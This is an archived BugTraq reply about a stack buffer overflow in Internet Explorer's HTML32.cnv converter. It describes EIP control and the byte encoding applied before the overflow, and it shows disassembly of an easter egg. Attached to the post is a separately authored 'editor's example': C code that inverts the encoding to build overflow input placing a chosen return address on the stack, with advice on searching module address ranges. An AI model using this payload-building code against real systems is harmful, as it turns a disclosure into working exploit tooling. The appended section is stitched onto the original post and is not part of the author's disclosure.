BugTraq
Re: Internet Explorer >=5.0 : Buffer overflow
Jun 26 2003 05:31PM
xenophi1e (oliver lavery sympatico ca)
In-Reply-To: <20030622005821.17280.qmail@www.securityfocus.com>
><script>
> wnd=open("about:blank","","");
> wnd.moveTo(screen.Width,screen.Height);
> WndDoc=wnd.document;
> WndDoc.open();
This is a good one. Works for me on IE 6.0.2800.1106.xpsp2.
It's a stack-based buffer overflow in HTML32.cnv, which is an HTML
converter .DLL with a funny extension (it's in \Program Files\Common
Files\Microsoft Shared\TextConv). You can control EBP, EIP, and some
regs. The only twist is that the buffer is encoded before the overflow
occurs. The encoding appears to be something like UTF-8; high ASCII is
transformed into multi-byte sequences, low ASCII is truncated (?!). This
is only a problem for getting a useful EIP in there, and not a very big
one by any means.
I'm no unicode guru, so maybe someone else knows if this is consistent
with UTF-8:
buffer += "\xcc\x59\xfb\x77";
// becomes \xc3\x8c\x59\xc3\xbb\x57
As a surreal side note, this DLL contains a strange easter egg:
.data:02344C94 aPresenting     db 'Presenting',0        ; DATA XREF: _EnsureDocClosure+2FCo
.data:02344C94                                          ; _EnsureDocClosure+308o
.data:02344C9F                 align 4
.data:02344CA0 aTheAnansi      db 'The Anansi',0        ; DATA XREF: _EnsureDocClosure+3C9o
.data:02344CA0                                          ; _EnsureDocClosure+3D5o
.data:02344CAB                 align 4
.data:02344CAC aAnansi         db 'Anansi',0            ; DATA XREF: _EnsureDocClosure+468o
.data:02344CB3                 align 4
.data:02344CB4 aAnansiTheSpide db 'Anansi, the spider, is the chief character in most Ghanaian '
.data:02344CB4                                          ; DATA XREF: _EnsureDocClosure+4FFo
.data:02344CB4                                          ; _EnsureDocClosure+50Bo
.data:02344CB4                 db 'folk tales.',0
.data:02344CFC aGenerallyRegar db ' Generally regarded as crafty and wise, he is often a maker '
.data:02344CFC                                          ; DATA XREF: _EnsureDocClosure+520o
.data:02344CFC                                          ; _EnsureDocClosure+52Co
.data:02344CFC                 db 'of mischief.',0
.data:02344D45                 align 4
.data:02344D48 aHeSeeksToSweep db ' He seeks to sweep up all the wisdom of the world in order t'
.data:02344D48                                          ; DATA XREF: _EnsureDocClosure+541o
.data:02344D48                                          ; _EnsureDocClosure+54Do
.data:02344D48                 db 'o be the wisest of all.',0
.data:02344D9C aDevelopmentTea db ' Development Team',0 ; DATA XREF: _EnsureDocClosure+5A9o
.data:02344D9C                                          ; _EnsureDocClosure+5B5o
Haven't figured out how to trigger it yet (just managed to find working
debug symbols for this DLL):
.text:02315420 _EnsureDocClosure proc near              ; CODE XREF: _ConvertForeignToRtf+E5p
.text:0231567D EasterEgg:                               ; CODE XREF: _EnsureDocClosure+1FCj
Cheers,
~ol
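Editor's added example, not part of xenophi1e's post or of the original PoC. It models the transform described in the post as plain Latin-1 to UTF-8, which is what the two observed high-byte pairs (CC -> C3 8C, FB -> C3 BB) are consistent with; that model is an assumption, and it passes bytes below 0x80 through unchanged rather than reproducing the 77 -> 57 the post reports. Under that model it answers the question a practitioner has before picking an EIP: which 4-byte return addresses can appear on the stack at all once the input has been encoded, and what input produces a given one. Only C2/C3 followed by 80..BF can occur as high bytes in the output, so an address such as 0x77FB59CC is unreachable, while an address whose bytes happen to form such pairs can be produced from a shorter input. All sample bytes are constructed for the example.

```c
/*
 * Added example (editor's, not from the post). Models the HTML32.cnv
 * transform reported above as Latin-1 -> UTF-8 (an assumption), and derives
 * which return addresses survive it and what input is needed to place one.
 */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Forward transform: 0x00-0x7F pass through, 0x80-0xFF become C2/C3 + 80..BF. */
size_t latin1_to_utf8(const uint8_t *in, size_t n, uint8_t *out, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; i < n; i++) {
        uint8_t c = in[i];
        if (c < 0x80) {
            if (o + 1 > cap) return 0;
            out[o++] = c;
        } else {
            if (o + 2 > cap) return 0;
            out[o++] = (uint8_t)(0xC0 | (c >> 6));   /* 0xC2 or 0xC3 */
            out[o++] = (uint8_t)(0x80 | (c & 0x3F)); /* 0x80..0xBF  */
        }
    }
    return o;
}

/* Inverse: given the byte image wanted on the stack AFTER encoding, derive the
 * input that yields it. Returns the input length, or 0 if some byte cannot be
 * produced: a high byte must appear as C2/C3 immediately followed by 80..BF. */
size_t utf8_to_latin1(const uint8_t *want, size_t n, uint8_t *in, size_t cap)
{
    size_t k = 0, i = 0;
    while (i < n) {
        uint8_t c = want[i];
        if (k >= cap) return 0;
        if (c < 0x80) {
            in[k++] = c;
            i += 1;
        } else if ((c == 0xC2 || c == 0xC3) && i + 1 < n &&
                   (want[i + 1] & 0xC0) == 0x80) {
            in[k++] = (uint8_t)(((c & 0x03) << 6) | (want[i + 1] & 0x3F));
            i += 2;
        } else {
            return 0;   /* e.g. 0xCC, 0xFB, or a continuation byte with no lead */
        }
    }
    return k;
}

/* True if all four little-endian bytes of addr are < 0x80, i.e. the address
 * reaches the stack byte-for-byte (the simplest usable EIP). */
int addr_survives(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xFF) >= 0x80) return 0;
    return 1;
}

/* Build the input for a stack image of `pad` filler bytes followed by `eip`
 * (little-endian). Returns the input length, or 0 if eip cannot be produced. */
size_t build_payload(size_t pad, uint32_t eip, uint8_t *in, size_t cap)
{
    uint8_t image[256];
    if (pad + 4 > sizeof image) return 0;
    memset(image, 'A', pad);
    for (int i = 0; i < 4; i++)
        image[pad + i] = (uint8_t)(eip >> (8 * i));
    return utf8_to_latin1(image, pad + 4, in, cap);
}

static void hexdump(const char *label, const uint8_t *p, size_t n)
{
    printf("%-10s", label);
    for (size_t i = 0; i < n; i++) printf(" %02x", p[i]);
    printf("\n");
}

int main(void)
{
    /* The post's bytes, CC 59 FB 77 (the address 0x77FB59CC), after encoding. */
    const uint8_t post[] = { 0xCC, 0x59, 0xFB, 0x77 };
    uint8_t enc[64], in[64];
    size_t n = latin1_to_utf8(post, sizeof post, enc, sizeof enc);
    hexdump("encoded:", enc, n);

    /* 0x77FB59CC cannot be reproduced on the stack at all... */
    printf("0x77FB59CC reachable: %s\n",
           build_payload(8, 0x77FB59CC, in, sizeof in) ? "yes" : "no");
    /* ...but 0x4180C359 (stack bytes 59 C3 80 41) can, from input 59 C0 41. */
    n = build_payload(8, 0x4180C359, in, sizeof in);
    hexdump("input:", in, n);
    n = latin1_to_utf8(in, n, enc, sizeof enc);
    hexdump("on stack:", enc, n);
    return 0;
}
```

Because every high input byte expands to two output bytes, the offset of the saved return address measured in input bytes depends on how many high bytes precede it; building the desired stack image first and inverting it, as build_payload does, sidesteps that bookkeeping. Candidate addresses are best chosen by running addr_survives (or build_payload) over the address range of the modules you have in mind rather than by hand.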
Copyright 2010, SecurityFocus